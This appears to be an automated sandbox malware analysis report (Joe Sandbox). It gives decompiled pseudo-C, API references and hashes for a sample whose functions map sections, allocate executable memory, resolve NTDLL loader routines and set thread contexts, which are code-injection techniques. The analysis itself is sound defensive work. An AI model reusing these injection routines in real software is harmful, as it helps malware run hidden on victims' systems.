0x00401472
0x00401473
0x00401477
0x0040147b
0x0040147f
0x00401483
0x00401487
0x0040148b
0x0040148f
0x00401493
0x00401497
0x0040149b
0x0040149f
0x004014a3
0x004014a7
0x004014ab
0x004014af
0x004014b3
0x004014b7
0x004014bb
0x004014bf
0x004014c3
0x004014c7
0x004014cb
0x004014cf
0x004014d3
0x004014d7
0x004014db
0x004014df
0x004014e3
0x004014e7
0x004014eb
0x004014ef
0x004014f3
0x004014f7
0x004014fb
0x004014ff
0x00401503
0x00401507
0x0040150b
0x0040150f
0x00401518
0x00401523
0x0040152e
0x00401534
0x0040153c
0x00401540
0x00401544
0x0040154a
0x0040154f
0x00401555
0x0040155b
0x00401562
0x0040156a
0x00401570
0x00401587
0x0040158c
0x00401591
0x00401598
0x0040159b
0x004015a0
0x004015a1
0x004015a4
0x004015a8
0x004015a9
0x004015ae
0x004015af
0x004015b4
0x004015b9
0x004015c4
0x004015ed
0x004015ed
0x004015d3
0x004015d3
0x004015de
0x00000000
0x00000000
0x004015de
0x004015c4
0x004015f7
0x004015f7
0x0040159b
0x0040158c
0x004015fd
0x004015fd
0x00401606
0x0040160e
0x00401613
0x00401616
0x0040161e
0x0040162a

APIs

SetupDiGetClassDevsA.SETUPAPI(?,00000000,00000000,00000002), ref: 00401544
SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 00401562
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,0000001C,0000000C,000000F7,00000000,00000000,?), ref: 00401587

Part of subcall function 00401671: HeapAlloc.KERNEL32(00000000,00000000,00402F6B,00000003,00000000,00000000,00000000,?,?), ref: 0040167D

SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,0000001C,0000000C,000000F7,00000000,?,?), ref: 004015B0
SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 004015FD

Strings

"30|, xrefs: 004015D3
\, xrefs: 004014EF
E, xrefs: 00401503
(, xrefs: 004014C3
E, xrefs: 004014EB
O, xrefs: 004014F3
c, xrefs: 004014CF
,, xrefs: 00401473
0, xrefs: 004014C7
', xrefs: 004014CB
l, xrefs: 004014FB
q|w, xrefs: 00401570
(, xrefs: 0040147B

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Setup$Device$InfoPropertyRegistry$AllocClassDestroyDevsEnumHeapList
String ID: "30|$'$($($,$0$E$E$O$\$c$l$q|w
API String ID: 2418760658-2988005389
Opcode ID: 38b483f6b249be8ffc2aa6abcc901d28e1b94d84e8b44a2533f6bcd35ce58fc5
Instruction ID: 2d59bf498828baa4fba1e5fe44d921c715b0fcd697b45136b42da1d516e35662
Opcode Fuzzy Hash: 38b483f6b249be8ffc2aa6abcc901d28e1b94d84e8b44a2533f6bcd35ce58fc5
Instruction Fuzzy Hash: DD615020C0428EEADF12DBE9DD44ADFBF756F16314F04026AF4607A2E1C3794A05C7A5

Uniqueness

Uniqueness Score: -1,00%

Function 00407E91, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 123
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00407E91(struct HINSTANCE__* _a4) {
				char _v8;
				struct _ITEMIDLIST* _v12;
				short _v532;
				short _v1052;
				void* __ebx;
				void* __edi;
				char* _t14;
				signed int _t17;
				signed int _t21;
				signed short _t22;
				struct HRSRC__* _t23;
				intOrPtr _t40;
				int _t41;
				void* _t45;
				signed int _t46;
				void* _t47;
				_Unknown_base(*)()* _t49;
				void* _t50;
				void* _t51;
				signed short _t52;
				signed int _t60;

				_t52 =  *0x46aba8; // 0x0
				if(_t52 == 0) {
					L4:
					_t14 =  &_v8;
					_t49 = 1;
					__imp__AuthzInitializeResourceManager(1, 0, 0, 0, 0, _t14); // executed
					if(_t14 == 0) {
						L00434B58(L"AuthzInitializeResourceManager failed with %d\n", GetLastError());
					} else {
						__imp__AuthzFreeResourceManager(_v8);
					}
					_t17 =  *0x46ab80; // 0x0
					_t40 =  *0x46ab84; // 0x788
					_t46 =  *0x46aba8 & 0x0000ffff;
					if(_t17 *  *0x46ab78 + _t40 <= 3) {
						MessageBoxA(0, 0x46acd0, 0x46abb0, 0);
						_t21 =  *0x46abac; // 0x0
						_t40 =  *0x46ab84; // 0x788
					} else {
						_t21 =  *0x46abac; // 0x0
						_t50 = 0xd;
						_t49 = _t50 - _t21;
					}
					if(_t40 != 0) {
						_t49 =  !=  ?  *0x46addc : _t49;
					}
					if(_t46 == 0) {
						_t22 =  ~_t21;
					} else {
						_t22 = GetUserDefaultLangID();
					}
					_t41 = _t22 & 0x0000ffff;
					_t60 =  *0x46ab80; // 0x0
					if(_t60 != 0) {
						__eflags = _t41;
						if(_t41 == 0) {
							_t23 = _a4;
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t41 - 0x400;
								if(_t41 != 0x400) {
									_t23 = FindResourceExW(_a4,  &_v1052,  &_v532, 0x400);
								}
							}
							goto L23;
						}
						FindResourceExW(_a4,  &_v1052,  &_v532, _t41);
						goto L19;
					} else {
						EnumTimeFormatsA(_t49, 0x400, 0); // executed
						L19:
						_t23 = _a4;
						L23:
						LoadResource(_a4, _t23);
						return 0;
					}
				} else {
					_t47 = E00409704(0, _t45, _t52);
					__imp__SHGetMalloc( &_v8, 0x64);
					SHGetSpecialFolderLocation(0, 0x11,  &_v12);
					_t51 = 0;
					do {
						__imp__SHGetSpecialFolderPathA(0, _t47, _t51, 0);
						_t51 = _t51 + 1;
					} while (_t51 <= 0x22);
					L00432138(_t47);
					goto L4;
				}
			}

0x00407e9f
0x00407ea5
0x00407ee1
0x00407ee1
0x00407eeb
0x00407eed
0x00407ef5
0x00407f0e
0x00407ef7
0x00407efa
0x00407efa
0x00407f15
0x00407f21
0x00407f27
0x00407f33
0x00407f4d
0x00407f53
0x00407f58
0x00407f35
0x00407f35
0x00407f3c
0x00407f3d
0x00407f3d
0x00407f60
0x00407f68
0x00407f68
0x00407f72
0x00407f7c
0x00407f74
0x00407f74
0x00407f74
0x00407f7e
0x00407f81
0x00407f87
0x00407f98
0x00407f9b
0x00407fba
0x00407fbd
0x00407fbf
0x00407fc6
0x00407fc9
0x00407fdd
0x00407fdd
0x00407fc9
0x00000000
0x00407fbf
0x00407faf
0x00000000
0x00407f89
0x00407f90
0x00407fb5
0x00407fb5
0x00407fe3
0x00407fe7
0x00407ff3
0x00407ff3
0x00407ea7
0x00407eae
0x00407eb5
0x00407ec2
0x00407ec8
0x00407eca
0x00407ece
0x00407ed4
0x00407ed5
0x00407edb
0x00000000
0x00407ee0

APIs

SHGetMalloc.SHELL32(004033FC), ref: 00407EB5
SHGetSpecialFolderLocation.SHELL32(00000000,00000011,00000000), ref: 00407EC2
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000000,00000000), ref: 00407ECE
AuthzInitializeResourceManager.AUTHZ(00000001,00000000,00000000,00000000,00000000,004033FC,?,?,00000000), ref: 00407EED
AuthzFreeResourceManager.AUTHZ(004033FC,?,?,00000000), ref: 00407EFA
GetLastError.KERNEL32(?,?,00000000), ref: 00407F02
MessageBoxA.USER32(00000000,0046ACD0,0046ABB0,00000000), ref: 00407F4D
GetUserDefaultLangID.KERNEL32(?,?,00000000), ref: 00407F74
EnumTimeFormatsA.KERNEL32(00000001,00000400,00000000), ref: 00407F90
FindResourceExW.KERNEL32(00000000,?,?,00000788,?,?,00000000), ref: 00407FAF
FindResourceExW.KERNEL32(00000000,?,?,00000400,?,?,00000000), ref: 00407FDD
LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407FE7

Strings

AuthzInitializeResourceManager failed with %d, xrefs: 00407F09

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Resource$AuthzFindFolderManagerSpecial$DefaultEnumErrorFormatsFreeInitializeLangLastLoadLocationMallocMessagePathTimeUser
String ID: AuthzInitializeResourceManager failed with %d
API String ID: 107088238-1543952925
Opcode ID: 2b5b00b16819e3a29fdf100ea93ef7880aae1ea09a5b77555f81272834d042bc
Instruction ID: 542bda8898fd41b6f36ca86a9143c4f1d8a6e53b73b52b4e90c9e98711d4d065
Opcode Fuzzy Hash: 2b5b00b16819e3a29fdf100ea93ef7880aae1ea09a5b77555f81272834d042bc
Instruction Fuzzy Hash: 16419175908119AFDB109FA4EC88EAB776DEB05741F104036FA02B2190D774BD51DB6F

Uniqueness

Uniqueness Score: -1,00%

Function 004032D4, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 159
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E004032D4(intOrPtr* _a4, signed int _a8, char _a12) {
				char _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* _v24;
				void* _v28;
				signed int _v32;
				signed int _t80;
				void _t81;
				signed int _t87;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t108;
				signed int _t111;
				signed int _t113;
				void* _t116;
				void _t117;
				intOrPtr _t123;
				signed int _t126;
				signed int _t130;
				void* _t133;
				void* _t134;

				_t1 =  &_a12; // 0x40395c
				_t116 = _a8;
				_t80 =  *_t1 & 0x00000010;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_v24 = E00403C02;
				_v32 = _t80;
				if(_t80 != 0 || ( *0x406464 & 0x00000001) == 0) {
					_t81 =  *_t116;
					_v20 = _t81;
					_t117 = _t81;
				} else {
					_t117 =  *(_t116 + 8);
					_v24 = 0x406000;
					_v20 = _t117;
				}
				if(_t117 != 0) {
					_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x3c)) + _t117 + 0x50)) + 0x00000fff & 0xfffff000;
					_t87 = E004039E1( *(_t116 + 0x14) + _t126 +  *(_t116 + 0x10) + 0xe58,  &_v12,  &_v16); // executed
					_a8 = _t87;
					if(_t87 != 0) {
						L19:
						if(_v12 != 0) {
							RtlNtStatusToDosError(NtUnmapViewOfSection(0xffffffff, _v12));
						}
						if(_v16 != 0) {
							CloseHandle(_v16); // executed
						}
						goto L23;
					}
					_t130 =  *0x4064c4; // 0x985e15fd
					_t133 = (_t130 ^ 0x985e1ba5) + _t126 + _v12;
					_v28 = _t133;
					_t94 = E004039A2(_v16,  *_a4,  &_v8); // executed
					_a8 = _t94;
					if(_t94 != 0) {
						goto L19;
					}
					_t31 =  &_v20; // 0x40395c
					_t95 = E00403AA0(_v12,  *_t31, _v8);
					_a8 = _t95;
					if(_t95 != 0) {
						goto L19;
					}
					memcpy(_t133,  *_t116,  *(_t116 + 0x10));
					_t98 =  *(_t116 + 0x14) >> 2;
					_a8 = _t98;
					if(_t98 == 0) {
						L13:
						_t134 = _v12 + _t126;
						asm("cdq");
						 *((intOrPtr*)(_t134 + 0x238)) = _v8;
						 *((intOrPtr*)(_t134 + 0x23c)) = _t123;
						memcpy(_t134 + 0x18, _t116, 0x220);
						asm("cdq");
						 *(_t134 + 0x18) = _t126 + _v8 + 0xe58;
						 *((intOrPtr*)(_t134 + 0x1c)) = _t123;
						asm("cdq");
						 *((intOrPtr*)(_t134 + 0x20)) = _v8 + _t126 +  *(_t116 + 0x10) + 0xe58;
						 *((intOrPtr*)(_t134 + 0x24)) = _t123;
						if(_v32 != 0 || ( *0x406464 & 0x00000001) == 0) {
							_t108 = E00403188(_t123, _t134);
						} else {
							_push( *_a4);
							_t108 = E00403235(_t123, _t134);
						}
						_a8 = _t108;
						if(_t108 == 0) {
							memcpy(_t134 + 0x248, _v24, 0x800);
							_t111 = E00402857(_t123, _a4, _t126 + _v8 + 0x248, _t126 + _v8, _a12); // executed
							_a8 = _t111;
						}
						goto L19;
					}
					while(1) {
						_t113 = _t98 << 2;
						_t123 = _t133 + _t113;
						 *((intOrPtr*)(_t123 +  *(_t116 + 0x10) - 4)) =  *((intOrPtr*)(_t113 +  *(_t116 + 8) - 4));
						_t98 = _a8 - 1;
						_a8 = _t98;
						if(_t98 == 0) {
							goto L13;
						}
						_t133 = _v28;
					}
					goto L13;
				} else {
					_a8 = 2;
					L23:
					return _a8;
				}
			}

0x004032da
0x004032de
0x004032e4
0x004032e8
0x004032eb
0x004032ee
0x004032f1
0x004032f8
0x004032fb
0x00403315
0x00403317
0x0040331a
0x00403306
0x00403306
0x00403309
0x00403310
0x00403310
0x0040331e
0x00403340
0x00403358
0x0040335f
0x00403362
0x00403496
0x0040349a
0x004034a8
0x004034a8
0x004034b2
0x004034b7
0x004034b7
0x00000000
0x004034b2
0x00403368
0x00403382
0x00403385
0x00403388
0x0040338f
0x00403392
0x00000000
0x00000000
0x0040339b
0x004033a1
0x004033a8
0x004033ab
0x00000000
0x00000000
0x004033b7
0x004033c2
0x004033c5
0x004033c8
0x004033ec
0x004033ef
0x004033f5
0x004033fb
0x00403406
0x0040340c
0x0040341b
0x0040341c
0x0040341f
0x00403431
0x00403439
0x0040343c
0x0040343f
0x00403458
0x0040344a
0x0040344d
0x00403450
0x00403450
0x0040345f
0x00403462
0x00403473
0x0040348e
0x00403493
0x00403493
0x00000000
0x00403462
0x004033cf
0x004033d2
0x004033d5
0x004033df
0x004033e6
0x004033e7
0x004033ea
0x00000000
0x00000000
0x004033cc
0x004033cc
0x00000000
0x00403320
0x00403320
0x004034bd
0x004034c4
0x004034c4

APIs

memcpy.NTDLL(?,00000000,?,?,\9@,?,00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004033B7
memcpy.NTDLL(?,00000000,00000220,00000000,00000000,00000000), ref: 0040340C
memcpy.NTDLL(?,?,00000800,?,?,?,?,00000000,00000000,00000000), ref: 00403473

Part of subcall function 00403188: GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,0040345D,?,?,?,?,00000000,00000000,00000000), ref: 004031BB
Part of subcall function 00403188: memcpy.NTDLL(?,3!|w,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll,?,?,?,00000000,00000000,00000000), ref: 00403226

Part of subcall function 00402857: memset.NTDLL ref: 00402876

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004034A1
RtlNtStatusToDosError.NTDLL(00000000), ref: 004034A8
CloseHandle.KERNELBASE(00000000), ref: 004034B7

Strings

\9@, xrefs: 0040339B
\9@, xrefs: 004032DA

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: memcpy$Handle$CloseErrorModuleSectionStatusUnmapViewmemset
String ID: \9@$\9@
API String ID: 3808786462-808546566
Opcode ID: 329fd7b19e1c6869edeca2bc8b4ded8deab87ff352cd8aba70d75de99e314824
Instruction ID: d07a796197b584df157aa958c894e2db15e979c0df63bc970061ad71b7ae8e01
Opcode Fuzzy Hash: 329fd7b19e1c6869edeca2bc8b4ded8deab87ff352cd8aba70d75de99e314824
Instruction Fuzzy Hash: A2516C71900208AFCF11DF59C884A9E7BB8BF48319F14856AE819BB291D7389B54CF88

Uniqueness

Uniqueness Score: -1,00%

Function 00403188, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403188(signed int __edx, void* _a4) {
				signed int _t6;
				signed int _t9;
				signed int _t12;
				void* _t19;
				void* _t20;
				signed int _t21;
				void* _t22;

				_t21 = __edx;
				_t22 = 0;
				if(( *0x4064c8 |  *0x4064cc) == 0 || ( *0x4064d0 |  *0x4064d4) == 0 || ( *0x4064d8 |  *0x4064dc) == 0) {
					_t22 = 0x7f;
					_t23 = GetModuleHandleA("NTDLL.DLL");
					if(_t4 != 0) {
						_t6 = E004021B8(_t4, _t19, _t20, "LdrLoadDll"); // executed
						asm("cdq");
						 *0x4064c8 = _t6;
						 *0x4064cc = _t21;
						if((_t6 | _t21) != 0) {
							_t9 = E004021B8(_t23, _t19, _t20, "LdrGetProcedureAddress"); // executed
							asm("cdq");
							 *0x4064d0 = _t9;
							 *0x4064d4 = _t21;
							if((_t9 | _t21) != 0) {
								_t12 = E004021B8(_t23, _t19, _t20, "ZwProtectVirtualMemory"); // executed
								asm("cdq");
								 *0x4064d8 = _t12;
								 *0x4064dc = _t21;
								if((_t12 | _t21) != 0) {
									_t22 = 0;
									goto L8;
								}
							}
						}
					}
				} else {
					L8:
					memcpy(_a4, "3!|w", 0x18);
				}
				return _t22;
			}

0x00403188
0x0040318f
0x00403197
0x004031b5
0x004031c1
0x004031c5
0x004031cc
0x004031d1
0x004031d2
0x004031d9
0x004031df
0x004031e8
0x004031ed
0x004031ee
0x004031f5
0x004031fb
0x00403204
0x00403209
0x0040320a
0x00403211
0x00403217
0x00403219
0x00000000
0x00403219
0x00403217
0x004031fb
0x004031df
0x0040321b
0x0040321b
0x00403226
0x0040322b
0x00403232

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,0040345D,?,?,?,?,00000000,00000000,00000000), ref: 004031BB
memcpy.NTDLL(?,3!|w,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll,?,?,?,00000000,00000000,00000000), ref: 00403226

Strings

LdrGetProcedureAddress, xrefs: 004031E1
3!|w, xrefs: 004031D2, 0040321D
ZwProtectVirtualMemory, xrefs: 004031FD
LdrLoadDll, xrefs: 004031C7
NTDLL.DLL, xrefs: 004031B6

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: HandleModulememcpy
String ID: 3!|w$LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$ZwProtectVirtualMemory
API String ID: 1801490239-1988010494
Opcode ID: aba386ecfd346c1f42018b0dce5027cf42ff72e75e5f628f89fab409fd4963db
Instruction ID: c8bdbd4b603bfa5c5a444b613304f9aad25a6d9a3fef13b018c8ae8190085718
Opcode Fuzzy Hash: aba386ecfd346c1f42018b0dce5027cf42ff72e75e5f628f89fab409fd4963db
Instruction Fuzzy Hash: 6801C075F10110BBC350DF16BF429063AA9A794B1171B493BF509FB3E1D2789A288A7D

Uniqueness

Uniqueness Score: -1,00%

Function 00402055, Relevance: 9.1, APIs: 6, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00402055(void* __ecx) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _t11;
				void* _t12;
				void* _t15;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr* _t26;
				void* _t29;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				 *0x40647c =  *0x40647c & 0x00000000;
				 *0x406468 = GetModuleHandleA(0);
				 *0x406460 = GetVersion();
				 *0x40645c = GetCurrentProcessId();
				_t11 = E00402B3D(_t23,  *0x40646c,  &_v8, 1);
				_v12 = _t11;
				if(_t11 != 0) {
					_t12 =  *0x406478; // 0x0
					if(_t12 != 0) {
						CloseHandle(_t12);
					}
					L7:
					return _v12;
				}
				_t22 = _v8;
				_t26 = __imp__GetLongPathNameW;
				_t15 =  *_t26(_t22, _t11, _t11); // executed
				_t29 = _t15;
				if(_t29 == 0) {
					L4:
					 *0x406474 = _t22;
					goto L7;
				}
				_t5 = _t29 + 2; // 0x2
				_t17 = E00401671(_t29 + _t5);
				 *0x406474 = _t17;
				if(_t17 == 0) {
					goto L4;
				}
				 *_t26(_t22, _t17, _t29); // executed
				E00401686(_t22);
				goto L7;
			}

0x00402055
0x00402058
0x00402059
0x0040205a
0x0040206c
0x00402077
0x00402082
0x00402093
0x0040209a
0x0040209d
0x004020db
0x004020e2
0x004020e5
0x004020e5
0x004020eb
0x004020f2
0x004020f2
0x0040209f
0x004020a2
0x004020ab
0x004020ad
0x004020b1
0x004020d3
0x004020d3
0x00000000
0x004020d3
0x004020b3
0x004020b8
0x004020bf
0x004020c4
0x00000000
0x00000000
0x004020c9
0x004020cc
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,7734DAA3,00000000,?,?,?,00401C7E), ref: 00402066
GetVersion.KERNEL32(?,?,?,00401C7E), ref: 00402071
GetCurrentProcessId.KERNEL32(?,?,?,00401C7E), ref: 0040207C

Part of subcall function 00402B3D: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,7734DAA3,?,?,00402098,?,00000001,?,?,?,00401C7E), ref: 00402B63

GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004020AB

Part of subcall function 00401671: HeapAlloc.KERNEL32(00000000,00000000,00402F6B,00000003,00000000,00000000,00000000,?,?), ref: 0040167D

GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004020C9

Part of subcall function 00401686: HeapFree.KERNEL32(00000000,00000000,004011C3), ref: 00401692

CloseHandle.KERNEL32(00000000), ref: 004020E5

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Name$HandleHeapLongModulePath$AllocCloseCurrentFileFreeProcessVersion
String ID:
API String ID: 1757875381-0
Opcode ID: 056781f77fe9dda2b2af43817a1e9870faef7132927642d0c609de2985c37d48
Instruction ID: 18eb7725c48a0dccb347b0df38d6dd5d710208f2610a6ff9246991da966dc74b
Opcode Fuzzy Hash: 056781f77fe9dda2b2af43817a1e9870faef7132927642d0c609de2985c37d48
Instruction Fuzzy Hash: 05112EB1501704AFE710AB71EE89E6B7BBCEB04344B010436FA02F22A1D6799840CF6D

Uniqueness

Uniqueness Score: -1,00%

Function 00402732, Relevance: 7.6, APIs: 5, Instructions: 93
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00402732(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr* __esi) {
				long _v8;
				char _v12;
				intOrPtr _v544;
				intOrPtr _v552;
				void _v724;
				struct _CONTEXT _v728;
				intOrPtr _t37;
				long _t39;
				void* _t46;
				long _t47;
				long _t49;
				intOrPtr _t54;
				void* _t55;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t62;
				void* _t66;

				_t62 = __esi;
				_t59 = __edx;
				_t55 = __ecx;
				_t60 = __eax;
				_v728 = 0;
				memset( &_v724, 0, 0x2c8);
				_t66 =  *((intOrPtr*)(_t60 + 8)) -  *0x40645c; // 0x24c
				if(_t66 == 0) {
					_push( *((intOrPtr*)(__esi + 0x10)));
					if( *((intOrPtr*)(__esi + 8))() == 0) {
						goto L13;
					} else {
						_v8 = 0;
						goto L12;
					}
				} else {
					_v728 = 0x10003;
					_t37 = E00402C3D(_t55,  *_t60); // executed
					_t54 = _t37;
					if(_t54 == 0) {
						L13:
						_v8 = GetLastError();
					} else {
						_t39 = E00402BC4( *(_t60 + 4),  &_v728);
						_v8 = _t39;
						if(_t39 != 0) {
							L12:
							if(_v8 == 0xffffffff) {
								goto L13;
							}
						} else {
							 *(__esi + 4) =  *(__esi + 4) & 0x00000000;
							 *__esi = _v544;
							_t11 = _t54 + 0x218; // 0x218
							_v544 = _t11;
							_t13 = _t62 + 0x218; // 0x218
							_v552 = _t54;
							memcpy(_t13, E00404191, 0x100);
							_t16 = _t62 + 0x18; // 0x18
							asm("cdq");
							if( *((intOrPtr*)(__esi + 0x10)) == _t16 &&  *((intOrPtr*)(__esi + 0x14)) == _t59) {
								asm("adc ecx, ecx");
								 *((intOrPtr*)(__esi + 0x10)) = _t54 + 0x18;
								 *((intOrPtr*)(__esi + 0x14)) = 0;
							}
							_t46 = E00402C11( *_t60, _t54, _t62, 0x318,  &_v12); // executed
							if(_t46 != 0) {
								_t61 =  *(_t60 + 4);
								_t47 = 0x7f;
								if( *0x4064b4 != 0) {
									_t49 = NtSetContextThread(_t61,  &_v728); // executed
									_t47 = RtlNtStatusToDosError(_t49);
								}
								_v8 = _t47;
								goto L12;
							}
						}
					}
				}
				return _v8;
			}

0x00402732
0x00402732
0x00402732
0x00402744
0x0040274e
0x00402754
0x0040275f
0x00402765
0x00402834
0x0040283c
0x00000000
0x0040283e
0x0040283e
0x00000000
0x0040283e
0x0040276b
0x0040276d
0x00402777
0x0040277c
0x00402780
0x00402847
0x0040284d
0x00402786
0x00402790
0x00402797
0x0040279a
0x00402841
0x00402845
0x00000000
0x00000000
0x004027a0
0x004027a6
0x004027aa
0x004027ac
0x004027b7
0x004027bd
0x004027c9
0x004027cf
0x004027d7
0x004027da
0x004027e0
0x004027f0
0x004027f2
0x004027f5
0x004027f5
0x00402805
0x0040280c
0x00402816
0x0040281b
0x0040281c
0x00402826
0x00402829
0x00402829
0x0040282f
0x00000000
0x0040282f
0x0040280c
0x0040279a
0x00402780
0x00402856

APIs

memset.NTDLL ref: 00402754
GetLastError.KERNEL32(?,00000318,00000008), ref: 00402847

Part of subcall function 00402C3D: NtAllocateVirtualMemory.NTDLL(0040277C,00000000,00000000,0040277C,00003000,00000040), ref: 00402C6E
Part of subcall function 00402C3D: RtlNtStatusToDosError.NTDLL(00000000), ref: 00402C75
Part of subcall function 00402C3D: SetLastError.KERNEL32(00000000), ref: 00402C7C

Part of subcall function 00402BC4: RtlNtStatusToDosError.NTDLL(00000000), ref: 00402BDC

memcpy.NTDLL(00000218,00404191,00000100,?,00010003,?,?,00000318,00000008), ref: 004027CF
NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 00402826
RtlNtStatusToDosError.NTDLL(00000000), ref: 00402829

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Error$Status$Last$AllocateContextMemoryThreadVirtualmemcpymemset
String ID:
API String ID: 3509679446-0
Opcode ID: b38f602a46ba662124e58605ee4f66b0a8e52741e3c63c6510bd3e758d1363a8
Instruction ID: a4a021ae1aa6a0b461820a35f1490c528edb22a4e950298e9bd03c5bd6c72826
Opcode Fuzzy Hash: b38f602a46ba662124e58605ee4f66b0a8e52741e3c63c6510bd3e758d1363a8
Instruction Fuzzy Hash: D8319E75900309AFDB20EF64CE89AAAB7B8EB04304F10457EE50AF72D1E774AE448B54

Uniqueness

Uniqueness Score: -1,00%

Function 004039E1, Relevance: 6.1, APIs: 4, Instructions: 79
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E004039E1(intOrPtr _a4, void** _a8, void* _a12) {
				int _v12;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				long _v36;
				int _v40;
				int _v44;
				void* _v48;
				long _t29;
				long _t33;
				long _t37;
				intOrPtr* _t41;
				long _t45;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t41 = _a12;
				asm("stosd");
				_v24 = _a4;
				_t29 = 0x40;
				_v36 = _t29;
				_a12 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t33 = NtCreateSection( &_a12, 0xf001f,  &_v48,  &_v24, _t29, 0x8000000, 0); // executed
				if(_t33 < 0) {
					_t45 = RtlNtStatusToDosError(_t33);
				} else {
					_t37 = E004039A2(_a12, 0xffffffff,  &_v12); // executed
					_t45 = _t37;
					if(_t45 == 0) {
						memset(_v12, 0, _v24);
						 *_a8 = _v12;
						if(_t41 != 0) {
							 *_t41 = _a12;
						}
					}
				}
				if(_a12 != 0 && _t41 == 0) {
					__imp__ZwClose(_a12);
				}
				return _t45;
			}

